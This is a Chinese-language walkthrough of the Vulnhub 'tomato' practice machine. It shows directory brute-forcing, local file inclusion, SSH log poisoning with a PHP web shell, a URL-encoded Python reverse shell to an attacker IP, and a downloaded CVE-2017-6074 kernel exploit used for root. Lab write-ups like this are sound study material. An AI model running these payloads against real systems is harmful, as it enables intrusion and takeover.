Vulnhub靶机tomato渗透思路

admin 2024年2月23日20:52:54评论11 views字数 1678阅读5分35秒阅读模式

信息收集

1.主机发现

Vulnhub靶机tomato渗透思路

收集80端口信息

Vulnhub靶机tomato渗透思路

没有收获后用dirb目录爆破

Vulnhub靶机tomato渗透思路

Vulnhub靶机tomato渗透思路

里面有很多目录,检查一下内容,在info.php中看到这是一个phpinfo的信息,查看源码得到一个注释:

Vulnhub靶机tomato渗透思路

这个注释提醒我们这里可能存在文件包含漏洞,image函数就是可以包含其他文件

Vulnhub靶机tomato渗透思路

验证成功

Vulnhub靶机tomato渗透思路

因为远程文件包含关闭,我们尝试进行本地文件包含

Vulnhub靶机tomato渗透思路

查看ssh默认的登录日志

view-source:http://192.168.110.137/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log

成功回显说明日志是在默认目录的那我们就可以在ssh登录时利用用户名注入木马

Vulnhub靶机tomato渗透思路

注入命令执行小马到ssh登录日志

ssh '<?php system($_GET['cmd']);?>'@192.168.110.137 -p 2211

Vulnhub靶机tomato渗透思路

执行一个目录查看注入成功否

view-source:http://192.168.110.137/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log&cmd=ls

Vulnhub靶机tomato渗透思路

验证是否存在python环境

view-source:http://192.168.110.137/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log&cmd=which%20python3

Vulnhub靶机tomato渗透思路

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.110.137",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

进行url编码后写入url

http://192.168.110.137/antibot_image/antibots/info.php/?image=/var/log/auth.log&cmd=python3%20-c%20%27import%20socket%2Csubprocess%2Cos%3B%0As%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22192.168.66.129%22%2C4444))%3B%0Aos.dup2(s.fileno()%2C0)%3B%0Aos.dup2(s.fileno()%2C1)%3B%20%0Aos.dup2(s.fileno()%2C2)%3B%0Ap%3Dsubprocess.call([%22%2Fbin%2Fsh%22%2C%22-i%22])%3B%27

本地用nc设置监听

nc -lvnp 4444

收到反弹shell后查看内核发现4.4.0-21
在网上搜索发现时存在内核提权的对应提权脚本下载

git clone https://github.com/kkamagui/linux-kernel-exploits.git

进入目录

cd/linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074

执行compile.sh后生成模块CVE-2017-6074

Vulnhub靶机tomato渗透思路

用python命令开启http将该模块下载到靶机
本地 python3 -m SimpleHTTPServer 8888
靶机http://192.168.66.129:8888/CVE-2017-6074(要进入/tmp目录下载)

Vulnhub靶机tomato渗透思路

给脚本执行权限chmod 750 CVE-2017-6074

执行脚本提权成功

Vulnhub靶机tomato渗透思路

原文始发于微信公众号(网络安全学习爱好者):Vulnhub靶机tomato渗透思路

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月23日20:52:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vulnhub靶机tomato渗透思路https://cn-sec.com/archives/2115377.html

发表评论

匿名网友 填写信息